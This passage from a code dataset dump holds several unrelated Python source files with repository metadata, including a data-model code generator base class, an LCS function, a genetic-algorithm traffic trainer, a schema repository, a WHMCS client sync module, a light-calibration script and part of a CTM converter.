lru_cache\nfrom pathlib import Path\nfrom typing import (\n TYPE_CHECKING,\n Any,\n ClassVar,\n DefaultDict,\n Dict,\n FrozenSet,\n Iterator,\n List,\n Optional,\n Set,\n Tuple,\n Union,\n)\n\nfrom jinja2 import Environment, FileSystemLoader, Template\nfrom pydantic import BaseModel\n\nfrom datamodel_code_generator import cached_property\nfrom datamodel_code_generator.imports import IMPORT_ANNOTATED, IMPORT_OPTIONAL, Import\nfrom datamodel_code_generator.reference import Reference, _BaseModel\nfrom datamodel_code_generator.types 
import DataType, chain_as_tuple\n\nTEMPLATE_DIR: Path = Path(__file__).parents[0] / 'template'\n\nOPTIONAL: str = 'Optional'\n\nALL_MODEL: str = '#all#'\n\n\nclass ConstraintsBase(BaseModel):\n ...\n\n\nclass DataModelFieldBase(_BaseModel):\n name: Optional[str]\n default: Optional[Any]\n required: bool = False\n alias: Optional[str]\n data_type: DataType\n constraints: Any = None\n strip_default_none: bool = False\n nullable: Optional[bool] = None\n parent: Optional[Any] = None\n extras: Dict[str, Any] = {}\n use_annotated: bool = False\n _exclude_fields: ClassVar[Set[str]] = {'parent'}\n _pass_fields: ClassVar[Set[str]] = {'parent', 'data_type'}\n\n if not TYPE_CHECKING:\n\n def __init__(self, **data: Any):\n super().__init__(**data)\n if self.data_type.reference or self.data_type.data_types:\n self.data_type.parent = self\n\n @property\n def type_hint(self) -> str:\n type_hint = self.data_type.type_hint\n\n if not type_hint:\n return OPTIONAL\n elif self.nullable is not None:\n if self.nullable:\n return f'{OPTIONAL}[{type_hint}]'\n return type_hint\n elif self.required:\n return type_hint\n return f'{OPTIONAL}[{type_hint}]'\n\n @property\n def imports(self) -> Tuple[Import, ...]:\n imports: List[Union[Tuple[Import], Iterator[Import]]] = [\n self.data_type.all_imports\n ]\n if self.nullable or (self.nullable is None and not self.required):\n imports.append((IMPORT_OPTIONAL,))\n if self.use_annotated:\n imports.append((IMPORT_ANNOTATED,))\n return chain_as_tuple(*imports)\n\n @property\n def unresolved_types(self) -> FrozenSet[str]:\n return self.data_type.unresolved_types\n\n @property\n def field(self) -> Optional[str]:\n \"\"\"for backwards compatibility\"\"\"\n return None\n\n @property\n def method(self) -> Optional[str]:\n return None\n\n @property\n def represented_default(self) -> str:\n return repr(self.default)\n\n @property\n def annotated(self) -> Optional[str]:\n return None\n\n\n@lru_cache()\ndef get_template(template_file_path: Path) -> Template:\n loader = FileSystemLoader(str(TEMPLATE_DIR / template_file_path.parent))\n environment: Environment = Environment(loader=loader)\n return environment.get_template(template_file_path.name)\n\n\ndef get_module_path(name: str, file_path: Optional[Path]) -> List[str]:\n if file_path:\n return [\n *file_path.parts[:-1],\n file_path.stem,\n *name.split('.')[:-1],\n ]\n return name.split('.')[:-1]\n\n\ndef get_module_name(name: str, file_path: Optional[Path]) -> str:\n return '.'.join(get_module_path(name, file_path))\n\n\nclass TemplateBase(ABC):\n @property\n @abstractmethod\n def template_file_path(self) -> Path:\n raise NotImplementedError\n\n @cached_property\n def template(self) -> Template:\n return get_template(self.template_file_path)\n\n @abstractmethod\n def render(self) -> str:\n raise NotImplementedError\n\n def _render(self, *args: Any, **kwargs: Any) -> str:\n return self.template.render(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.render()\n\n\nclass BaseClassDataType(DataType):\n ...\n\n\nclass DataModel(TemplateBase, ABC):\n TEMPLATE_FILE_PATH: ClassVar[str] = ''\n BASE_CLASS: ClassVar[str] = ''\n DEFAULT_IMPORTS: ClassVar[Tuple[Import, ...]] = ()\n\n def __init__(\n self,\n *,\n reference: Reference,\n fields: List[DataModelFieldBase],\n decorators: Optional[List[str]] = None,\n base_classes: Optional[List[Reference]] = None,\n custom_base_class: Optional[str] = None,\n custom_template_dir: Optional[Path] = None,\n extra_template_data: Optional[DefaultDict[str, Dict[str, Any]]] = None,\n methods: 
Optional[List[str]] = None,\n path: Optional[Path] = None,\n description: Optional[str] = None,\n ) -> None:\n if not self.TEMPLATE_FILE_PATH:\n raise Exception('TEMPLATE_FILE_PATH is undefined')\n\n template_file_path = Path(self.TEMPLATE_FILE_PATH)\n if custom_template_dir is not None:\n custom_template_file_path = custom_template_dir / template_file_path.name\n if custom_template_file_path.exists():\n template_file_path = custom_template_file_path\n self._template_file_path = template_file_path\n\n self.fields: List[DataModelFieldBase] = fields or []\n self.decorators: List[str] = decorators or []\n self._additional_imports: List[Import] = []\n self.custom_base_class = custom_base_class\n if base_classes:\n self.base_classes: List[BaseClassDataType] = [\n BaseClassDataType(reference=b) for b in base_classes\n ]\n else:\n self.set_base_class()\n\n self.file_path: Optional[Path] = path\n self.reference: Reference = reference\n\n self.reference.source = self\n\n self.extra_template_data = (\n extra_template_data[self.name]\n if extra_template_data is not None\n else defaultdict(dict)\n )\n\n for base_class in self.base_classes:\n if base_class.reference:\n base_class.reference.children.append(self)\n\n if extra_template_data:\n all_model_extra_template_data = extra_template_data.get(ALL_MODEL)\n if all_model_extra_template_data:\n self.extra_template_data.update(all_model_extra_template_data)\n\n self.methods: List[str] = methods or []\n\n self.description = description\n for field in self.fields:\n field.parent = self\n\n self._additional_imports.extend(self.DEFAULT_IMPORTS)\n\n def set_base_class(self) -> None:\n base_class_import = Import.from_full_path(\n self.custom_base_class or self.BASE_CLASS\n )\n self._additional_imports.append(base_class_import)\n self.base_classes = [BaseClassDataType.from_import(base_class_import)]\n\n @property\n def template_file_path(self) -> Path:\n return self._template_file_path\n\n @property\n def imports(self) -> Tuple[Import, ...]:\n return chain_as_tuple(\n (i for f in self.fields for i in f.imports),\n self._additional_imports,\n )\n\n @property\n def reference_classes(self) -> FrozenSet[str]:\n return frozenset(\n {r.reference.path for r in self.base_classes if r.reference}\n | {t for f in self.fields for t in f.unresolved_types}\n )\n\n @property\n def name(self) -> str:\n return self.reference.name\n\n @property\n def base_class(self) -> str:\n return ', '.join(b.type_hint for b in self.base_classes)\n\n @property\n def class_name(self) -> str:\n if '.' 
in self.name:\n return self.name.rsplit('.', 1)[-1]\n return self.name\n\n @property\n def module_path(self) -> List[str]:\n return get_module_path(self.name, self.file_path)\n\n @property\n def module_name(self) -> str:\n return get_module_name(self.name, self.file_path)\n\n @property\n def all_data_types(self) -> Iterator['DataType']:\n for field in self.fields:\n yield from field.data_type.all_data_types\n yield from self.base_classes\n\n @cached_property\n def path(self) -> str:\n return self.reference.path\n\n def render(self) -> str:\n response = self._render(\n class_name=self.class_name,\n fields=self.fields,\n decorators=self.decorators,\n base_class=self.base_class,\n methods=self.methods,\n description=self.description,\n **self.extra_template_data,\n )\n return response\n","repo_name":"VladimirZHC/OpenApiGenerator","sub_path":"venv/lib/python3.8/site-packages/datamodel_code_generator/model/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3954914776","text":"# accepts 2 strings, a and b\n# finds longest common subsequence, and returns the value of lcs string\ndef lcs(a, b):\n A, B = len(a), len(b)\n dp = [[''] * (B + 1) for _ in range(A + 1)]\n for i in range(1, A + 1):\n for j in range(1, B + 1):\n if a[i - 1] == b[j - 1]: dp[i][j] = dp[i - 1][j - 1] + a[i - 1] \n else: dp[i][j] = dp[i-1][j] if len(dp[i-1][j]) > len(dp[i][j - 1]) else dp[i][j - 1]\n return dp[A][B]","repo_name":"ak-19/Essential-Algorithms","sub_path":"subsequences/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26337847884","text":"from geneticAlgo import Population \nfrom os import mkdir\n\npopulation_size = 70\nnum_of_generation = 3000\nmutate_prob = 0.1\nretain_prob = 0.03\nselect_prob = 0.4\ntype_evolution = 1 # 1 for no crossover, 0 for crossover\ndimensions = (8, 10, 5, 1)\ntraining_no = 8\ntraffic = 1.0\n\nclass Train:\n \n def __init__(self):\n mkdir(\"./results/training\"+str(training_no))\n with open(\"./results/training\"+str(training_no)+\"/logs.txt\", \"w\") as file:\n file.write(\"population_size : \" + str(population_size) + \"\\n\")\n file.write(\"num_of_generation : \" + str(num_of_generation) + \"\\n\")\n file.write(\"mutate_prob : \" + str(mutate_prob) + \"\\n\")\n file.write(\"retain_prob : \" + str(retain_prob) + \"\\n\")\n file.write(\"select_prob : \" + str(select_prob) + \"\\n\")\n file.write(\"type_evolution : \" + str(type_evolution) + \"\\n\")\n file.write(\"dimensions : \" + str(dimensions) + \"\\n\")\n file.write(\"training_no : \" + str(training_no) + \"\\n\")\n file.write(\"traffic : \" + str(traffic) + \"\\n\")\n self.population = Population(population_size,mutate_prob,retain_prob,select_prob, dimensions, training_no, traffic)\n self.best = None\n\n def execute(self):\n for generation in range(num_of_generation):\n with open(\"./results/training\"+str(training_no)+\"/res.txt\", \"a\") as file:\n file.write(\"Generation No : \"+str(generation)+\"\\n\\n\")\n self.population.runSimulation()\n self.population.evolve(type_evolution)\n self.best = self.population.population_fitness\n with open(\"./results/training\"+str(training_no)+\"/res.txt\", \"a\") as file:\n file.write(\"Generation best : \" + str(self.best) + \"\\n\\n\\n\")\n self.bestModel = self.population.bestModel\n\ntrain = 
Train()\ntrain.execute()\n\n","repo_name":"rishabh7699/traffic_sumo","sub_path":"source/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69985790241","text":"import json\nimport logging\n\nfrom esdlvalidator.core.exceptions import NameAlreadyExists, InvalidJSON, SchemaNotFound\n\nfrom tinydb import TinyDB, Query\nfrom os import path\n\nfrom esdlvalidator.validation.abstract_repository import SchemaRepository\n\nlogger = logging.getLogger(__name__)\n\n\nclass FileSchemaRepository(SchemaRepository):\n \"\"\"Repository for retrieving, adding, deleting validation schemas\"\"\"\n\n def __init__(self, location: str):\n \"\"\"Create a repository and initialize the 'database' from the given file\"\"\"\n\n if not path.exists(location):\n try:\n f = open(location, \"x\")\n logger.info(\"Created database file {0}\".format(location))\n except:\n msg = \"Unable to create database file: {0}\".format(location)\n logger.critical(msg)\n raise OSError(msg)\n\n self.db = TinyDB(location)\n self.table = self.db.table(\"schema\")\n\n def get_all(self):\n \"\"\"Retrieve all schema's\"\"\"\n\n documents = self.table.all()\n for doc in documents:\n doc[\"id\"] = doc.doc_id\n return documents\n\n def get_by_id(self, id: int):\n \"\"\"Retrieve a schema by ID\n\n Args:\n id (int): ID of the schema\n\n Returns:\n schema (Document): Validation schema\n\n Raises:\n SchemaNotFound: Validation schema was not found\n \"\"\"\n\n id = self.__id_to_int(id)\n\n if not self.table.contains(doc_id=id):\n raise SchemaNotFound(msg=\"Requested schema with id {0} not found\".format(id))\n\n return self.table.get(doc_id=id)\n\n def get_by_ids(self, ids: list):\n \"\"\"Retrieve multiple schemas by a list of id's\n\n Args:\n ids (list): List with schema id's\n\n Returns:\n schemas: One or more validation schema\n\n Raises:\n SchemaNotFound: One of the validation schemas was not found\n \"\"\"\n\n schemas = []\n for id in ids:\n id = self.__id_to_int(id)\n if not self.table.contains(doc_id=id):\n raise SchemaNotFound(msg=\"Requested schema with id {0} not found\".format(id))\n\n schema = self.table.get(doc_id=id)\n schema['id'] = id\n schemas.append(schema)\n\n return schemas\n\n def get_by_name(self, name: str):\n \"\"\"Retrieve a schema by name\n\n Args:\n name (string): Name of the schema\n\n Returns:\n schema: Validation schema\n\n Raises:\n SchemaNotFound: Validation schema was not found\n \"\"\"\n\n Schema = Query()\n schemas = self.table.search(Schema.name == name)\n\n if len(schemas) == 0:\n raise SchemaNotFound(msg=\"Requested schema with name {0} not found\".format(name))\n\n # return schema 0 since name should be unique and there should be no other schemas\n return schemas[0]\n\n def insert(self, jsonString: str):\n \"\"\"Insert a new schema\n\n Args:\n json (string): The schema JSON string\n\n Returns:\n schemaID: The created id for the schema, can be used to retrieve the schema\n\n Raises:\n InvalidJSON: If json is not a valid json string or schema name already exist\n NameAlreadyExists: If database already contains a document with the same name\n \"\"\"\n\n try:\n document = json.loads(jsonString)\n except:\n raise InvalidJSON\n\n Schema = Query()\n schemas = self.table.search(Schema.name == document[\"name\"])\n if len(schemas) != 0:\n raise NameAlreadyExists\n\n schemaID = self.table.insert(document)\n return schemaID\n\n def remove_by_id(self, id: int):\n \"\"\"Remove schema by ID\n\n 
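The id may arrive as an int or a str; it is coerced by __id_to_int,\n        which raises SchemaNotFound when the value is not a valid integer.\n\n        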
Args:\n id (int): Schema id\n\n Returns:\n schemaID: schema id when found\n\n Raises:\n SchemaNotFound: Validation schema was not found\n \"\"\"\n\n id = self.__id_to_int(id)\n\n if not self.table.contains(doc_id=id):\n raise SchemaNotFound(msg=\"Unable to remove, no schema found for id: {0}\".format(id))\n\n removed = self.table.remove(doc_ids=[id])\n return removed[0]\n\n def update(self, id: int, jsonString: str):\n \"\"\"Update schema by id\n\n Args:\n id (int): Schema id\n jsonString (string): schema json string\n\n Returns:\n schemaID: The updated id of the schema\n\n Raises:\n InvalidJSON: If json is not a valid json string or schema name already exist\n SchemaNotFound: Validation schema was not found\n \"\"\"\n\n id = self.__id_to_int(id)\n\n if not self.table.contains(doc_id=id):\n raise SchemaNotFound\n\n try:\n document = json.loads(jsonString)\n except:\n raise InvalidJSON\n\n self.table.update(document, doc_ids=[id])\n return id\n\n def __id_to_int(self, id):\n try:\n return int(id)\n except:\n raise SchemaNotFound(msg=\"Requested schema with id {0} not found\".format(id))\n","repo_name":"ESDLMapEditorESSIM/ESDLValidator","sub_path":"esdlvalidator/validation/file_repository.py","file_name":"file_repository.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22915603050","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import api, fields, models\n\n\nclass WizardJobScaleDownModel(models.TransientModel):\n _name = 'wizard.job.scale.down.model'\n\n line_id = fields.Many2one('hr.job.move.grade.line', string=u'الوظيفة', required=1)\n job_id = fields.Many2one('hr.job', related='line_id.job_id', string=u'الوظيفة', required=1)\n\n @api.onchange('job_id')\n def _onchange_job_id(self):\n res = {}\n job_ids = []\n if not self.job_id:\n move_ids = self.env['hr.job.move.grade'].search([('move_type', '=', 'scale_down'), ('state', '!=', 'done')])\n if move_ids:\n for rec in move_ids:\n job_ids += [line.job_id.id for line in rec.job_movement_ids]\n res['domain'] = {'job_id': [('id', 'in', job_ids)]}\n return res\n # return empty job list\n res['domain'] = {'job_id': [('id', '=', -1)]}\n return res\n\n\n @api.multi\n def print_report(self):\n report_action = self.env['report'].get_action(self, 'smart_hr.report_job_scale_down_model')\n data = {'ids': [], 'form': self.read([])[0]}\n report_action['data'] = data\n return report_action\n","repo_name":"rouag/orvea","sub_path":"smart_hr/job/wizard/wizard_job_scale_down_model.py","file_name":"wizard_job_scale_down_model.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30554740301","text":"import decimal\nfrom datetime import datetime\n\nfrom django.db import transaction\nfrom django.utils import timezone\n\nfrom fleio.core.models import Client\nfrom fleio.core.models import ClientStatus\nfrom whmcsync.whmcsync.exceptions import DBSyncException\nfrom whmcsync.whmcsync.models import SyncedAccount\nfrom whmcsync.whmcsync.models import Tblclients\nfrom whmcsync.whmcsync.operations import add_client_groups\nfrom whmcsync.whmcsync.operations import match_currency\nfrom whmcsync.whmcsync.operations import sync_client_credit\nfrom whmcsync.whmcsync.sync.client_contacts import sync_client_contacts\nfrom whmcsync.whmcsync.sync.utils import FieldToSync\nfrom whmcsync.whmcsync.sync.utils import sync_fields\nfrom whmcsync.whmcsync.utils import 
WHMCS_LOGGER\n\n\nclass ClientField(FieldToSync):\n record_name = 'Client'\n\n\nCLIENT_FIELDS_TO_SYNC = [\n ClientField(fleio_key='first_name', whmcs_key='firstname', fleio_max_length=127),\n ClientField(fleio_key='last_name', whmcs_key='lastname', fleio_max_length=127),\n ClientField(fleio_key='company', whmcs_key='companyname', fleio_max_length=127),\n ClientField(fleio_key='address1', whmcs_key='address1', fleio_max_length=255),\n ClientField(fleio_key='address2', whmcs_key='address2', fleio_max_length=255),\n ClientField(fleio_key='city', whmcs_key='city', fleio_max_length=127),\n ClientField(fleio_key='country', whmcs_key='country', fleio_max_length=2),\n ClientField(fleio_key='state', whmcs_key='state', fleio_max_length=127),\n ClientField(fleio_key='zip_code', whmcs_key='postcode', fleio_max_length=10),\n ClientField(fleio_key='phone', whmcs_key='phonenumber', fleio_max_length=64),\n ClientField(fleio_key='vat_id', whmcs_key='tax_id', fleio_max_length=32),\n ClientField(fleio_key='tax_exempt', whmcs_key='taxexempt'),\n]\n\n\ndef sync_client(id, whmcs_client=None):\n \"\"\"Synchronizes WHMCS clients.\"\"\"\n add_partially_synced_account = False\n if whmcs_client is None:\n try:\n whmcs_client = Tblclients.objects.get(id=id)\n except (Tblclients.DoesNotExist, ValueError):\n raise DBSyncException('WHMCS client ID %s is not valid.' % id)\n\n # check if client already exists from a previous import\n synced_account = SyncedAccount.objects.filter(\n whmcs_id=whmcs_client.pk,\n whmcs_uuid=whmcs_client.uuid,\n subaccount=False\n ).first()\n if synced_account:\n client = synced_account.client\n else:\n add_partially_synced_account = True # we shall add a synced account without user for later use\n # check if client already exists because of using fleio-whmcs module\n # and not because of using a previous import\n client = Client.objects.filter(external_billing_id=whmcs_client.uuid).first()\n\n if not client:\n client = Client()\n\n # process client fields\n sync_fields(fleio_record=client, whmcs_record=whmcs_client, fields_to_sync=CLIENT_FIELDS_TO_SYNC)\n\n whmcs_status_to_fleio = whmcs_client.status.lower()\n if whmcs_status_to_fleio not in ClientStatus.name_map.keys():\n WHMCS_LOGGER.warning(\n 'WHMCS client {} status not compatible with Fleio statuses. 
Fallback on inactive status.'.format(id)\n )\n whmcs_status_to_fleio = ClientStatus.inactive\n client.status = whmcs_status_to_fleio\n\n client.currency = match_currency(whmcs_client)\n client.uptodate_credit = decimal.Decimal('0.00')\n\n if whmcs_client.created_at:\n client.date_created = whmcs_client.created_at\n elif whmcs_client.datecreated:\n whmcs_date_created = datetime.combine(whmcs_client.datecreated, datetime.min.time())\n whmcs_date_created = timezone.make_aware(whmcs_date_created, timezone=timezone.utc)\n client.date_created = whmcs_date_created\n\n with transaction.atomic():\n client.save()\n sync_client_credit(fleio_client=client, amount=whmcs_client.credit, currency_code=whmcs_client.currency.code)\n\n if add_partially_synced_account:\n # add new synced account without user (will be populated later)\n SyncedAccount.objects.create(\n whmcs_id=whmcs_client.id,\n whmcs_uuid=whmcs_client.uuid,\n client=client,\n user=None,\n subaccount=False\n )\n add_client_groups(fleio_client=client, whmcs_client=whmcs_client)\n sync_client_contacts(fleio_client=client, whmcs_client=whmcs_client)\n return whmcs_client.id\n\n\ndef sync_clients(fail_fast, whmcs_ids=None):\n \"\"\"Synchronizes all WHMCS clients and users.\"\"\"\n exception_list = []\n client_list = []\n qs = Tblclients.objects.all()\n if whmcs_ids and isinstance(whmcs_ids, list) and len(whmcs_ids):\n qs = qs.filter(id__in=whmcs_ids)\n for client in qs:\n try:\n synced_id = sync_client(id=client.id, whmcs_client=client)\n client_list.append('{} {} - {} (ID: {})'.format(client.firstname,\n client.lastname,\n client.companyname,\n synced_id))\n except Exception as ex:\n WHMCS_LOGGER.exception(ex)\n exception_list.append(ex)\n if fail_fast:\n break\n\n return client_list, exception_list\n","repo_name":"fleio/whmcs2fleio","sub_path":"whmcsync/sync/clients.py","file_name":"clients.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36687017699","text":"# your code goes here\ns=input()\nl=list(s)\nj=len(l)-1\nc=0\nfor i in s:\n\tif i==l[j] and j>=0:\n\t\tc=c+1\n\t\tj=j-1\n\telse:\n\t\tbreak\nif c==len(l):\n\tprint(\"YES\")\nelse:\n\tprint(\"NO\")\n #link list\n","repo_name":"Ponkiruthika112/codekataset1","sub_path":"link_pal/link_pal.py","file_name":"link_pal.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18049237026","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 11 16:37:42 2022\n\n@author: jtm545\n\nScript to make the stimuli for the MonBin2 experiment. 
\n\"\"\"
\n\"\"\"\nimport os\nimport os.path as op\nfrom pprint import pprint\nimport pickle\nfrom datetime import datetime\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom pysilsub.problems import SilentSubstitutionProblem as SSP\n\n# %% ~~~ PLOT STYLE ~~~\n\nplt.style.use('seaborn')\nplt.rcParams['font.size'] = 14\nplt.rcParams['font.family'] = 'Helvetica'\n\n# %% Functions\n\n\ndef check_exists(folder: str) -> str:\n if not op.exists(folder):\n os.makedirs(folder)\n return folder\n\n\n# %% ~~~ CONSTANTS ~~~\n\n\nMINTENSITY = 0\nMAXTENSITY = 4095\nBACKGROUND = MAXTENSITY/2\nFs = 100 # STLAB switching time\nMAX_S_CONE_CONTRAST = .45\n\n\n# %% ~~~ MAIN SCRIPT ~~~\n\ndef main():\n\n gamma_folder = check_exists('./gamma/')\n\n # Load predictive models for each device and plug in the observer\n S1 = SSP.from_json('./STLAB_1_York.json')\n S2 = SSP.from_json('./STLAB_2_York.json')\n\n # We know that the two devices differ slightly in output. Here we obtain\n # a calibration ratio for each LED that *may* be used to perform a simple\n # correction later.\n S1_S2_calibration_ratio = (\n S1.calibration.groupby(level=0).sum().sum(axis=1)\n / S2.calibration.groupby(level=0).sum().sum(axis=1)\n )\n print('> S1/S2 LED calibration ratio')\n print(S1_S2_calibration_ratio)\n S1_S2_calibration_ratio.to_csv('./S1_S2_calibration_ratio.csv')\n\n # To scale Y-axis for calibration plots\n max_counts = max(S1.calibration.max().max(), S2.calibration.max().max())\n\n # Plot the calibration spds, do the gamma corrections, save output, etc.\n for device in [S1, S2]:\n # Plot spds\n fig, ax = plt.subplots(figsize=(12, 4))\n device.plot_calibration_spds(ax=ax)\n ax.set_ylim(0, max_counts*1.05)\n fig.savefig(\n f'./{device.config[\"json_name\"]}_calibration_spds.svg')\n\n # Keep a log of which device / calibration was used to prepare the stims\n # and at what time\n with open(f'./{device.config[\"json_name\"]}_device_log.txt', 'w') as fh:\n pprint(S1.config, stream=fh)\n print(f'\\n> Time created: {datetime.now()}', file=fh)\n\n # Perform gamma correction\n device.do_gamma(fit='polynomial')\n device.gamma[device.gamma < MINTENSITY] = MINTENSITY\n device.gamma[device.gamma > MAXTENSITY] = MAXTENSITY\n device.gamma.to_csv(\n op.join(gamma_folder, f'./{device.config[\"json_name\"]}_gamma_table.csv'))\n device.plot_gamma(save_plots_to=gamma_folder, show_corrected=True)\n\n # Match backgrounds and pickle\n S1.background = pd.Series([.5] * S1.nprimaries)\n S2.background = S1.background * S1_S2_calibration_ratio\n\n # Pickle backgrounds so they can be loaded at start of experiment script\n with open('./STLAB_1_background.pkl', 'wb') as fh:\n pickle.dump(S1.w2s(S1.background), fh)\n with open('./STLAB_2_background.pkl', 'wb') as fh:\n pickle.dump(S2.w2s(S2.background), fh)\n \n # Save plot of the background spectra\n fig, ax = plt.subplots()\n s1_bg = S1.predict_multiprimary_spd(S1.background)\n s2_bg = S2.predict_multiprimary_spd(S2.background)\n ax.plot(s1_bg, label='STLAB_1 background')\n ax.plot(s2_bg, label='STLAB_2 background')\n ax.legend()\n ax.set_xlabel('Wavelength (nm)')\n ax.set_ylabel(S1.config['calibration_units'])\n ax.set_title('Background spectra')\n fig.savefig('./Background_spectra.svg')\n \nif __name__ == '__main__':\n main()\n","repo_name":"jtmbeta/MonBinSTLABMRI","sub_path":"calibration/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} 
+{"seq_id":"71361206563","text":"import asyncio\nimport os\nfrom praatio import audio, textgrid\nfrom typing import List\nfrom scipy.io import wavfile\n\nfrom src.utils.ctm_line import CtmLine\nfrom src.logger import logger\n\n\nclass CtmConverter:\n def __init__(\n self,\n use_ref: bool,\n base_name: str,\n ctm_path: str,\n audio_path: str,\n SEGMENT_DURATION_SEC: float = 15,\n MIN_SEGMENT_LENGTH_FACTOR: float = 0.5,\n MIN_SILENCE_SEC: float = 0.150,\n MIN_WORD_SEC: float = 0,\n ) -> None:\n\n # Check inputs.\n assert os.path.exists(ctm_path), \"ctm_path '%s' does not exist.\" % ctm_path\n assert os.path.exists(audio_path), (\n \"audio_path '%s' does not exist.\" % audio_path\n )\n assert (\n SEGMENT_DURATION_SEC > 0\n ), \"SEGMENT_DURATION_SEC must be a positive float.\"\n assert (\n MIN_SEGMENT_LENGTH_FACTOR > 0 and MIN_SEGMENT_LENGTH_FACTOR <= 1\n ), \"MIN_SEGMENT_LENGTH_FACTOR must be a float in (0,1].\"\n assert MIN_SILENCE_SEC >= 0, \"MIN_SILENCE_SEC must be a float in [0,+inf)\"\n assert MIN_WORD_SEC >= 0, \"MIN_WORD_SEC must be a float in [0,+inf)\"\n\n # Save inputs for debugging.\n self.base_name = base_name\n self.ctm_path = ctm_path\n self.audio_path = audio_path\n self.SEGMENT_DURATION_SEC = SEGMENT_DURATION_SEC\n self.MIN_SEGMENT_LENGTH_FACTOR = MIN_SEGMENT_LENGTH_FACTOR\n self.MIN_SILENCE_SEC = MIN_SILENCE_SEC\n self.MIN_WORD_SEC = MIN_WORD_SEC\n\n # Parse lines.\n with open(ctm_path, encoding=\"utf-8\", mode=\"r\") as f:\n ctm_lines = [CtmLine(use_ref, line=line) for line in f]\n\n # Append silences.\n eps = 1e-5\n i = 0\n while i < len(ctm_lines) - 1:\n # Insert silence?\n if ctm_lines[i + 1].start > ctm_lines[i].end + eps:\n ctm_lines.insert(\n i + 1,\n CtmLine(\n use_ref,\n utt_id=ctm_lines[i].utt_id,\n channel=ctm_lines[i].channel,\n start=ctm_lines[i].end,\n end=ctm_lines[i + 1].start,\n word=\"\",\n score=1.0,\n ),\n )\n continue\n\n # Remove overlap?\n if ctm_lines[i + 1].start < ctm_lines[i].end - eps:\n if ctm_lines[i + 1].score <= ctm_lines[i].score:\n # Move next line's start bound.\n ctm_lines[i + 1].start = ctm_lines[i].end\n else:\n # Move this line's end bound.\n ctm_lines[i].end = ctm_lines[i + 1].start\n\n # Remove segments that are too short.\n if ctm_lines[i].word == \"\":\n min_len = self.MIN_SILENCE_SEC\n else:\n min_len = self.MIN_WORD_SEC\n if ctm_lines[i].end - ctm_lines[i].start < min_len + eps:\n # Short silences are divied over neighboring words.\n if ctm_lines[i].word == \"\":\n duration = ctm_lines[i].end - ctm_lines[i].start\n if i > 0:\n ctm_lines[i - 1].end += duration / 2\n ctm_lines[i + 1].start -= duration / 2\n else:\n ctm_lines[i + 1].start -= duration\n ctm_lines.remove(ctm_lines[i])\n continue\n\n i += 1\n\n # Heuristic punctuation based on silences.\n silences = []\n for line in ctm_lines:\n if line.word == \"\":\n silences.append(line.end - line.start)\n\n # Punctuation threshold = longest xx% of silences\n PUNC_THRESHOLD = 0.40\n silences_sort = sorted(silences)\n idx = int(PUNC_THRESHOLD * len(silences_sort))\n PUNC_SILENCE_DURATION = silences_sort[idx]\n\n # Likely sentence starts for punctuation.\n likely_starts = [\n *(\"ik\", \"jij\", \"je\", \"hij\", \"zij\", \"ze\", \"u\", \"jullie\"),\n *(\"de\", \"het\", \"dit\", \"dat\"),\n *(\"en\", \"maar\", \"dus\", \"dan\", \"toen\"),\n ]\n\n # Insert punctuation.\n last_punctuation = -1\n i = 0\n while i < len(ctm_lines):\n\n # Don't allow short sentences (minimum 3 words)\n # \". 
A B .\"\n # 0* 1 2 3*\n if i - last_punctuation <= 3:\n i += 1\n continue\n\n line = ctm_lines[i]\n line_duration = line.end - line.start\n if line.word == \"\" and line_duration > PUNC_SILENCE_DURATION:\n\n # Search for likely sentence starts.\n j = i + 1\n while j < len(ctm_lines):\n line_j = ctm_lines[j]\n if not line_j.is_filler and line_j.word != \"\":\n if line_j.word in likely_starts:\n line.word = \".\"\n i = j\n last_punctuation = j\n break\n j += 1\n\n # Final word ends with period.\n if i == len(ctm_lines) - 1:\n line.word = \".\"\n\n i += 1\n\n self.data = {\n \"audio_path\": audio_path,\n \"ctm_lines\": ctm_lines,\n \"utterance\": self._lines_to_utterance(ctm_lines),\n }\n\n def _interval_to_str(self, start: float, end: float, value: str):\n return \"(start=%0.4f,end=%0.4f,value=%s)\" % (start, end, value)\n\n def _fix_rounding_errors(self, entries, minT, maxT):\n new_entries = []\n last_start = None\n last_end = None\n last_value = None\n for start, end, value in entries:\n\n # Make copies, so we can still log the original variables.\n new_start = start\n new_end = end\n\n # Check valid start/end times. Print error message if error is too large.\n eps = 1e-3\n if new_start < minT:\n if minT - new_start > eps:\n msg = \"Problem with interval %s: start time is smaller than minT (%0.4f).\"\n msg %= (self._interval_to_str(start, end, value), minT)\n logger.error(msg)\n new_start = minT\n if new_end > maxT:\n if new_end - maxT > eps:\n msg = \"Problem with interval %s: end time is larger than maxT (%0.4f).\"\n msg %= (self._interval_to_str(start, end, value), maxT)\n logger.error(msg)\n new_end = maxT\n\n # Also check if this start time is not before the previous end time.\n if last_end is not None and new_start < last_end:\n if last_end - new_start > eps:\n msg = \"Problem with consecutive intervals %s, %s: start time is smaller than previous end time.\"\n msg %= (\n self._interval_to_str(last_start, last_end, last_value),\n self._interval_to_str(start, end, value),\n )\n logger.error(msg)\n new_start = last_end\n\n # Make sure the interval is not zero-length!\n if new_start > new_end - eps:\n msg = 